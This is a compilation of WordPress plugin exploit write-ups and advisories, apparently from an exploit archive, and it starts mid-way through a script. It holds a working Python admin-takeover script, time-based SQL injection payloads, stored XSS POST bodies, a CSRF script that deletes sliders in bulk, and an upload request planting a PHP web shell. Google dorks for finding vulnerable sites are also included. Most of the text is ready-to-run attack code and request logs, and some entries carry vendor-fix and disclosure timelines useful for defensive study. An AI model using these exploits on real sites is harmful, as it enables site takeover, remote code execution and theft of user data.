username = "user-%d" % random.randrange(1000000, 3000000)
email = raw_input("[+] E-mail: ")
def ChangeOption(site, url, option_name, content):
params = urllib.urlencode({'action': 'hc_ajax_save_option', 'option_name': option_name, 'content': content})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
conn = httplib.HTTPSConnection(site) # conn = httplib.HTTPConnection(site)
conn.request("POST", url, params, headers)
response = conn.getresponse()
data = response.read()
conn.close()
registration_url= "/wp-login.php"
def AdminTakeover(site, registration_url, user_login, user_email):
params = urllib.urlencode({'action': 'register', 'user_login': user_login, 'user_email': user_email})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
conn = httplib.HTTPSConnection(site) # conn = httplib.HTTPConnection(site)
conn.request("POST", registration_url, params, headers)
response = conn.getresponse()
data = response.read()
conn.close()
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "[+] Registering new admin user"
AdminTakeover(site, registration_url, username, email)
print "[+] Check your email for password: " + username + "[" + email + "]"
ChangeOption(site, url, "users_can_register", "0")
ChangeOption(site, url, "default_role", "subscriber")
###########################################################
DefenseCode ThunderScan SAST Advisory
WordPress Huge-IT Video Gallery Plugin
Security Vulnerability
Advisory ID: DC-2017-01-009
Advisory Title: WordPress Huge-IT Video Gallery plugin SQL injection
vulnerability
Advisory URL: http://www.defensecode.com/advisories.php
Software: WordPress Huge-IT Video Gallery plugin
Language: PHP
Version: 2.0.4 and below
Vendor Status: Vendor contacted, update released
Release Date: 2017/05/24
Risk: High
1. General Overview
===================
During the security audit of Huge-IT Video Gallery plugin for
WordPress CMS, security vulnerability was discovered using DefenseCode
ThunderScan application source code security analysis platform.
More information about ThunderScan is available at URL:
http://www.defensecode.com
2. Software Overview
====================
According to the developers, Gallery Video plugin was created and
specifically designed to show video links in unusual splendid gallery
types supplemented of many gallery options.
According to wordpress.org, it has more than 40,000 active installs.
Homepage:
https://wordpress.org/plugins/gallery-video/
http://huge-it.com/wordpress-video-gallery/
3. Vulnerability Description
==================================
During the security analysis, ThunderScan discovered SQL injection
vulnerability in Huge-IT Video Gallery WordPress plugin.
The easiest way to reproduce the vulnerability is to visit the
provided URL while being logged in as administrator or another user
that is authorized to access the plugin settings page. Users that do
not have full administrative privileges could abuse the database
access the vulnerability provides to either escalate their privileges
or obtain and modify database contents they were not supposed to be
able to.
Due to the missing nonce token, the attacker the vulnerable code is
also directly exposed to attack vectors such as Cross Site request
forgery (CSRF).
3.1 SQL injection
Vulnerable Function: $wpdb->get_var( $query );
Vulnerable Variable: $_POST['cat_search']
Vulnerable URL:
http://www.vulnerablesite.com/wp-admin/admin.php?page=video_galleries_huge_it_video_gallery
Vulnerable Body: cat_search=DefenseCode AND (SELECT * FROM (SELECT(SLEEP(5)))DC)
File:
gallery-video\includes\admin\class-gallery-video-galleries.php
---------
107 $cat_id = sanitize_text_field( $_POST['cat_search'] );
...
118 $where .= " AND sl_width=" . $cat_id;
...
127 $query = "SELECT COUNT(*) FROM " . $wpdb->prefix .
"huge_it_videogallery_galleries" . $where;
128 $total = $wpdb->get_var( $query );
---------
4. Solution
===========
Vendor resolved the security issues. All users are strongly advised to
update WordPress Huge-IT Video Gallery plugin to the latest available
version.
5. Credits
==========
Discovered with DefenseCode ThunderScan Source Code Security Analyzer
by Neven Biruski.
6. Disclosure Timeline
======================
2017/03/31 Vendor contacted
2017/04/06 Vendor responded
2017/05/24 Advisory released to the public
7. About DefenseCode
====================
DefenseCode L.L.C. delivers products and services designed to analyze
and test web, desktop and mobile applications for security
vulnerabilities.
DefenseCode ThunderScan is a SAST (Static Application Security
Testing, WhiteBox Testing) solution for performing extensive security
audits of application source code. ThunderScan SAST performs fast and
accurate analyses of large and complex source code projects delivering
precise results and low false positive rate.
DefenseCode WebScanner is a DAST (Dynamic Application Security
Testing, BlackBox Testing) solution for comprehensive security audits
of active web applications. WebScanner will test a website's security
by carrying out a large number of attacks using the most advanced
techniques, just as a real attacker would.
Subscribe for free software trial on our website
http://www.defensecode.com/ .
E-mail: defensecode[at]defensecode.com
Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/
# Exploit Title: WordPress: wordpress huge-it-slider 2.7.5 & Persistent JS-HTML Code injection, Arbitrary slider deletion
# Date: 2015-06-23
# Google Dork: intitle:"index of" intext:"/wp-content/plugins/slider-image/"
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Software Link: https://downloads.wordpress.org/plugin/slider-image.latest-stable.zip
# Version: 2.7.5
# Tested on: windows 7 ultimate + Firefox.
# video demo: https://www.youtube.com/watch?v=RTLAbmyBIU8
====================================================
* CSRF + Persistent JS/HTML Injection
====================================================
=====================
DECRIPTION
=====================
An attacker can make a user with access privileges to a page containing malicious script
and send some parameters injected JavaScript to the database.
============================
vulnerable POST parameters
============================
//variables with variation names//
order_by_[variation_number]
titleimage[variation_number]
sl_url[variation_number]
sl_link_target[variation_number]
im_description[variation_number]
imagess[variation_number]
//variables with constant names//
sl_pausetime
sl_changespeed
===============
EXPLOTATION
===============
variable numbers can be extracted from a published page containing the slider. and make all
parameters injected with code JS / HTML.
-------------------
EXAMPLE
-------------------
[Extracting data for use]
In a vulnerable site and has posted a slider, the malicious user can extract information
the attack is successful.
-----------------------------------------------------------------------------------------
[variation_number] is a variable number that could be extracted as follows.
-----------------------------------------------------------------------------------------
The attacker sees the following framento source code of the page with slider:
<!-- ##########################DOTS######################### -->
<div class="huge_it_slideshow_dots_container_2"> [ <---SLIDER_ID_FOUND=2 ]
<div class="huge_it_slideshow_dots_thumbnails_2">
<div id="huge_it_dots_0_1" class="huge_it_slideshow_dots_1 huge_it_slideshow_dots_active_1"
onclick="huge_it_change_image_1(parseInt(jQuery('#huge_it_current_image_key_1').val()), '0', data_1,false,true);
return false;"
image_id="14" [ <---ITS_VARIATION_NUMBER!!! ]
image_key="0"></div>
</div>
<a id="huge_it_slideshow_left_1" href="#" >
<div id="huge_it_slideshow_left-ico_1">
<div><i class="huge_it_slideshow_prev_btn_1 fa"></i></div></div>
</a>
<a id="huge_it_slideshow_right_1" href="#" >
<div id="huge_it_slideshow_right-ico_1 , data_1">
<div><i class="huge_it_slideshow_next_btn_1 fa"></i></div></div>
</a>
</div>
<!-- ##########################IMAGES######################### -->
-----------------------------------------------------------------------------------
Classes tags [<div>] have a number at the end that is the id of the slider.
Also labeled [<div id = "huge_it_dots_ ...>] has the property [image_id] which is the
POST variable number of vulnerable parameters.
============================================
POC [DATA RELATING TO THE ABOVE]
============================================
------------ SLIDER_ID
URL REQUEST |
------------
http://localhost/wordpress/wp-admin/admin.php?page=sliders_huge_it_slider&id=2&task=apply
--------
POSTDATA
--------
name=i0akiN-SEC&order_by_14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&imagess14=&
titleimage14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
sl_url14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&sl_link_target14=&
sl_pausetime=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
sl_changespeed=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
im_description14=as%3C%2Ftextarea%3E%3Cscript%3Ealert%28%2Fi0akiN_HACK%2F%29%3B%3C%2Fscript%3E&
imagess14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&sl_width=500&
sl_height=300&pause_on_hover=off&slider_effects_list=cubeH&sl_position=center&task=
--------------------
RESPONSE ADMIN PAGE
--------------------
...
<input class="order_by" type="hidden" name="order_by_14" value="0" />
<div class="image-container">
<img src="" onmouseover=alert(/i0akiN_hack/) a="" />
<div>
<script>
... </script>
<input type="hidden" name="imagess14" id="_unique_name14" value="" onmouseover=alert(/i0akiN_hack/) a="" />
<span class="wp-media-buttons-icon"></span>
<div class="huge-it-editnewuploader uploader button14 add-new-image">
<input type="button" class="button14 wp-media-buttons-icon editimageicon" name="_unique_name_button14" id="_unique_name_button14" value="Edit image" />
</div>
</div>
</div>
<div class="image-options">
<div>
<label for="titleimage14">Title:</label>
<input class="text_area" type="text" id="titleimage14" name="titleimage14" id="titleimage14" value="" onmouseover=alert(/i0akiN_hack/) a="">
</div>
<div class="description-block">
<label for="im_description14">Description:</label>
<textarea id="im_description14" name="im_description14" >as</textarea><script>alert(/i0akiN_HACK/);</script></textarea>
</div>
<div class="link-block">
<label for="sl_url14">URL:</label>
<input class="text_area url-input" type="text" id="sl_url14" name="sl_url14" value="" onmouseover=alert(/i0akiN_hack/) a="" >
<label class="long" for="sl_link_target14">Open in new tab</label>
<input type="hidden" name="sl_link_target14" value="" />
<input class="link_target" type="checkbox" id="sl_link_target14" name="sl_link_target14" />
</div>
<div class="remove-image-container">
<a class="button remove-image" href="admin.php?page=sliders_huge_it_slider&id=2&task=apply&removeslide=14">Remove Image</a>
</div>
</div>
<div class="clear"></div>
</li>
</ul>
</div>
</div>
<div id="postbox-container-1" class="postbox-container">
<div id="side-sortables" class="meta-box-sortables ui-sortable">
<div id="slider-unique-options" class="postbox">
...
<li>
<label for="sl_pausetime">Pause time</label>
<input type="text" name="sl_pausetime" id="sl_pausetime" value="" onmouseover=alert(/i0akiN_hack/) a="" class="text_area" />
</li>
<li>
<label for="sl_changespeed">Change speed</label>
<input type="text" name="sl_changespeed" id="sl_changespeed" value="" onmouseover=alert(/i0akiN_hack/) a="" class="text_area" />
</li>
...
-----------------------------------------
RESPONSE PUBLISHED PAGE WITH IMAGE SLIDER
-----------------------------------------
...
<script>
var data_2 = [];
var event_stack_2 = [];
video_is_playing_2 = false;
data_2["0"] = []; data_2["0"]["id"] = "0"; data_2["0"]["image_url"] = "" onmouseover = alert(/i0akiN_hack/) a = ""; data_2["0"]["description"] = "as</textarea>
<script>alert(/i0akiN_HACK/);</script>";data_2["0"]["alt"]="' onmouseover=alert(/i0akiN_hack/) a='";
===<!-- SUCCESFULL INJECTION :) -->===
var huge_it_trans_in_progress_2 = false;
var huge_it_transition_duration_2 = " onmouseover=alert(/i0akiN_hack/) a=";
var huge_it_playInterval_2;
// Stop autoplay.
window.clearInterval(huge_it_playInterval_2);
....
<!-- ##########################IMAGES######################### -->
<div id="huge_it_slideshow_image_container_2" class="huge_it_slideshow_image_container_2">
<div class="huge_it_slide_container_2">
<div class="huge_it_slide_bg_2">
<ul class="huge_it_slider_2">
<li class="huge_it_slideshow_image_item_2" id="image_id_2_0">
<a href="" onmouseover=alert(/i0akiN_hack/) a="" ><img id="huge_it_slideshow_image_2" class="huge_it_slideshow_image_2"
src="" onmouseover=alert(/i0akiN_hack/) a="" image_id="14" />
</a>
<div class="huge_it_slideshow_title_text_2 "> " onmouseover=alert(/i0akiN_hack/) a="</div>
<div class="huge_it_slideshow_description_text_2 ">as</textarea><script>alert(/i0akiN_HACK/);</script> </div>
</li>
<input type="hidden" id="huge_it_current_image_key_2" value="0" />
</ul>
</div>
</div>
</div>
...
-----------------------------------------
RESPONSE PUBLISHED PAGE WITH IMAGE SLIDER
-----------------------------------------
...
<script>
var data_2 = [];
var event_stack_2 = [];
video_is_playing_2 = false;
data_2["0"] = []; data_2["0"]["id"] = "0"; data_2["0"]["image_url"] = "" onmouseover = alert(/i0akiN_hack/) a = ""; data_2["0"]["description"] = "as</textarea>
<script>alert(/i0akiN_HACK/);</script>";data_2["0"]["alt"]="' onmouseover=alert(/i0akiN_hack/) a='";
===<!-- SUCCESFULL INJECTION :) -->===
var huge_it_trans_in_progress_2 = false;
var huge_it_transition_duration_2 = " onmouseover=alert(/i0akiN_hack/) a=";
var huge_it_playInterval_2;
// Stop autoplay.
window.clearInterval(huge_it_playInterval_2);
....
<!-- ##########################IMAGES######################### -->
<div id="huge_it_slideshow_image_container_2" class="huge_it_slideshow_image_container_2">
<div class="huge_it_slide_container_2">
<div class="huge_it_slide_bg_2">
<ul class="huge_it_slider_2">
<li class="huge_it_slideshow_image_item_2" id="image_id_2_0">
<a href="" onmouseover=alert(/i0akiN_hack/) a="" ><img id="huge_it_slideshow_image_2" class="huge_it_slideshow_image_2"
src="" onmouseover=alert(/i0akiN_hack/) a="" image_id="14" />
</a>
<div class="huge_it_slideshow_title_text_2 "> " onmouseover=alert(/i0akiN_hack/) a="</div>
<div class="huge_it_slideshow_description_text_2 ">as</textarea><script>alert(/i0akiN_HACK/);</script> </div>
</li>
<input type="hidden" id="huge_it_current_image_key_2" value="0" />
</ul>
</div>
</div>
</div>
...
====================================
* CSRF & ARBITRARY SLIDER DELETION
====================================
=====================
POC
=====================
//delete first 100 sliders
<script>
function sendData( id_slider ){
var req=new XMLHttpRequest();
req.open("GET","http://localhost/wordpress/wp-admin/admin.php?page=sliders_huge_it_slider&task=remove_cat&id="+id_slider,true);
req.withCredentials="true";
req.send();
}
for(var i=0;i<100;i++){
sendData( i );
}
</script>
token authentication not found!
# Exploit Title: WordPress plugin Image Gallery Full Path Disclosure and SQL Injection
# Google Dork: inurl:"wp-content/plugins/gallery-images/"
# Date: 12-05-2016
# Software Link: https://fr.wordpress.org/plugins/gallery-images/
# Version: 1.8.9 and prior
# Exploit Author: Gwendal Le Coguic
# Website: http://10degres.net
# Category: webapps
##### About #####
Huge-IT Image Gallery is the best plugin to use if you want to be original with your website.
##### Full Path Disclosure #####
http://[target]/wp-content/plugins/gallery-images/gallery-images.php
##### SQL Injection #####
Headers X-Forwarded-For and Client-Ip are vulnerable.
Vulnerable code: at lines 101, 259, 420, 559, 698 the variable $huge_it_ip is missing sanitization
Payload: 123.123.123.123' AND (SELECT * FROM (SELECT(SLEEP(5)))suRI) AND 'uDsL'='uDsL
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: [target]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Client-Ip: 123.123.123.123
X-Forwarded-For: 123.123.123.123
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 89
action=huge_it_video_gallery_ajax&task=load_images_content&galleryid=1&page=1&perpage=100
### Extras infos #####
The "galleryid" must be configured or try another id.
You don't need to be authed to exploit the injection but the plugin must be enable.
"task" parameter can be:
load_images_content
load_images_lightbox
load_image_justified
load_image_thumbnail
load_blog_view
Client-Ip overwrite X-Forwarded-For.
Some system drop those headers.
##### References #####
https://www.owasp.org/index.php/Full_Path_Disclosure
https://www.owasp.org/index.php/SQL_Injection
# Exploit Title: WordPress Plugin HS Brand Logo Slider 2.1 - 'logoupload' File Upload
# Date: 2020-10-20
# Exploit Author: Net-Hunter
# Google Dork: N/A
# Software Link: https://ms.wordpress.org/plugins/hs-brand-logo-slider/
# Vendor Homepage: https://www.heliossolutions.co/
# Tested on: Linux Apache / Wordpress 5.5.1
# Version: 2.1
.:: Description ::.
An Authenticated User Can Bypass Uploader of the Plugin and Upload Arbitary File
Because the extension of the Uploaded Flie is Checked on Client Side
.:: Vulnerable File ::.
/wp-admin/admin.php?page=hs-brand-logo-slider.php
.:: Vulnerable Code ::.
Content-Disposition: form-data; name="logoupload"; filename="a.php"
Content-Type: image/jpeg
<?php echo system($_GET['cmd']); ?>
.:: Proof Of Concept (Poc) ::.
Step 1 - Log in to your account , Select hs-brand-logo-slider from the menu
Upload
Step 2 - Stop the upload request with burp suite
Step 3 - Rename the file, for example a.jpg to a.php
Step 4 - Your shell has been uploaded, showing the file path in the table
.:: Sample Request::.
POST /wp-admin/admin.php?page=hs-brand-logo-slider.php HTTP/1.1
Host: 172.16.1.17:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.1.17:81/wp-admin/admin.php?page=hs-brand-logo-slider.php
Content-Type: multipart/form-data; boundary=---------------------------407602771734524910834293111227
Content-Length: 81765
Origin: http://172.16.1.17:81
Connection: close
Cookie: wordpress_558570ec66c8a5729fc0bd982edbc38a=admin%7C1603353703%7Ckvhq1mWuwe5MGz3wZpw8Rxi5eiJtxYMQDHzZFCkebGS%7C15d778148be9d49e48b6275e009642192e10b1d8a9e5e44a191141084f2618b6; wp-settings-time-2=1592045029; wp-settings-2=libraryContent%3Dbrowse%26editor%3Dtinymce; wp_learn_press_session_558570ec66c8a5729fc0bd982edbc38a=9c5476d130f39254b97895578a6cf9e2%7C%7C1603353694%7C%7Cd6957c27eda7a311e486866587a08500; wordpress_test_cookie=WP+Cookie+check; wordpress_lp_guest=fad4f6783283c86762dc8944423947d0; wordpress_logged_in_558570ec66c8a5729fc0bd982edbc38a=admin%7C1603353703%7Ckvhq1mWuwe5MGz3wZpw8Rxi5eiJtxYMQDHzZFCkebGS%7C80d7786798b351d10cbdfe07ba50c31d2400ccbfb173d4b90255cab42791ccd7; wp-settings-time-1=1603180907
Upgrade-Insecure-Requests: 1
-----------------------------407602771734524910834293111227
Content-Disposition: form-data; name="brandname"
aaa
-----------------------------407602771734524910834293111227
Content-Disposition: form-data; name="logoupload"; filename="eftekharr.php"
Content-Type: image/jpeg
<?php echo system($_GET['cmd']); ?>
-----------------------------407602771734524910834293111227
Content-Disposition: form-data; name="logourl"
http://aa.com
-----------------------------407602771734524910834293111227
Content-Disposition: form-data; name="sortorder"
1
-----------------------------407602771734524910834293111227
Content-Disposition: form-data; name="submit_data"
Submit
-----------------------------407602771734524910834293111227--
# Exploit Title: WordPress Plugin Hotel Listing 3 - 'Multiple' Cross-Site Scripting (XSS)
# Date: 2021-10-28
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://hotel.eplug-ins.com/
# Software Link: https://hotel.eplug-ins.com/hoteldoc/
# Version: v3
# Tested on: Linux
Document Title:
===============
Hotel Listing (WP Plugin) v3.x - MyAccount XSS Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2277
Release Date:
=============
2021-10-28
Vulnerability Laboratory ID (VL-ID):
====================================
2277
Common Vulnerability Scoring System:
====================================
5.3
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Hotel, Motel , Bar & Restaurant Listing Plugin + Membership plugin using Wordpress with PHP and MySQL Technologie.
(Copy of the Homepage:https://hotel.eplug-ins.com/hoteldoc/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the official Hotel Listing v3.x wordpress plugin web-application.
Affected Product(s):
====================
e-plugins
Product: Hotel Listing v3.x - Plugin Wordpress (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-08-19: Researcher Notification & Coordination (Security Researcher)
2021-08-20: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-28: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Guest Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities has been discovered in the official Hotel Listing v3.x wordpress plugin web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to
web-application requests from the application-side.
The vulnerabilities are located in add new listing - address, city, zipcode, country and location input fields of the my-account module.
Remote attackers can register a low privileged application user account to inject own malicious script codes with persistent attack vector to
hijack user/admin session credentials or to permanently manipulate affected modules. The execute of the malicious injected script code takes
place in the frontend on preview but as well in the backend on interaction to edit or list (?&profile=all-post) by administrative accounts.
The request method to inject is post and the attack vector is persistent located on the application-side.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Add New Listing
Vulnerable Input(s):
[+] address
[+] city
[+] zipcode
[+] country
Affected Module(s):
[+] Frontend on Preview (All Listings)
[+] Backend on Preview (All Listings) or Edit
Proof of Concept (PoC):
=======================
The persistent web vulnerabilities can be exploited by remote attackers with privilged user accounts with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Exploitation: Payload
%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E
Vulnerable Source: new-listing
<div class=" form-group row">
<div class="col-md-6 ">
<label for="text" class=" control-label col-md-4 ">Address</label>
<input type="text" class="form-control col-md-8 " name="address" id="address" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter address Here">
</div>
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">Area</label>
<input type="text" class="form-control col-md-8" name="area" id="area" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter Area Here">
</div>
</div>
<div class=" form-group row">
<div class="col-md-6 ">
<label for="text" class=" control-label col-md-4">City</label>
<input type="text" class="form-control col-md-8" name="city" id="city" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter city ">
</div>
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">Zipcode</label>
<input type="text" class="form-control col-md-8" name="postcode" id="postcode" value="<[MALICIOUS SCRIPT CODE PAYLOAD!]>">>""
placeholder="Enter Zipcode ">
</div>
</div>
<div class=" form-group row">
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">State</label>
<input type="text" class="form-control col-md-8" name="state" id="state" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter State ">
</div>
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">Country</label>
<input type="text" class="form-control col-md-8" name="country" id="country" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter Country ">
</div>
--- PoC Session Logs (POST) ---
http://hotel-eplug-ins.localhost:8000/wp-admin/admin-ajax.php
Host: hotel-eplug-ins.localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1603
Origin:http://hotel-eplug-ins.localhost:8000
Connection: keep-alive
Referer:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=new-listing
-
action=iv_directories_save_listing&form_data=cpt_page=hotel&title=test1&new_post_content=test2&logo_image_id=&feature_image_id=
&gallery_image_ids=&post_status=pending&postcats%5B%5D=&address=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&area=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
city=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&postcode=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
state=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&country=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
latitude=&longitude=&new_tag=&phone=&fax=&contact-email=&contact_web=&award_title%5B%5D=&award_description%5B%5D=&
award_year%5B%5D=&menu_title%5B%5D=&menu_description%5B%5D=&menu_price%5B%5D=&menu_order%5B%5D=&room_title%5B%5D=&room_description%5B%5D=&room_price%5B%5D=&
room_order%5B%5D=&override_bookingf=no&booking_stcode=&youtube=&vimeo=&facebook=&linkedin=&twitter=&gplus=&pinterest=&instagram=&Rooms=&suites=&
Rating_stars=&CHECK_IN=&CHECK_out=&Cancellation=&Pets=&Children_and_Extra_Beds=&day_name%5B%5D=Monday+&day_value1%5B%5D=&
day_value2%5B%5D=&event-title=&event-detail=++&event_image_id=&user_post_id=&_wpnonce=50241bc992
-
POST: HTTP/1.1 200 OK
Server: nginx/1.18.0
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin:http://hotel-eplug-ins.localhost:8000
Access-Control-Allow-Credentials: true
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Content-Encoding: gzip
-
http://hotel-eplug-ins.localhost:8000/my-account-2/?&profile=all-post
Host: hotel-eplug-ins.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=new-listing
-
GET: HTTP/1.1 200 OK
Server: nginx/1.18.0
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=all-post
Solution - Fix & Patch:
=======================
1. Encode and parse all vulnerable input fields on transmit via post method request
2. Restrict the input fields to disallow usage of special chars
3. Encode and escape the output content in the edit and list itself to prevent the execution point
Security Risk:
==============
The security risk of the persistent cross site scripting web vulnerability in the hotel listing application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE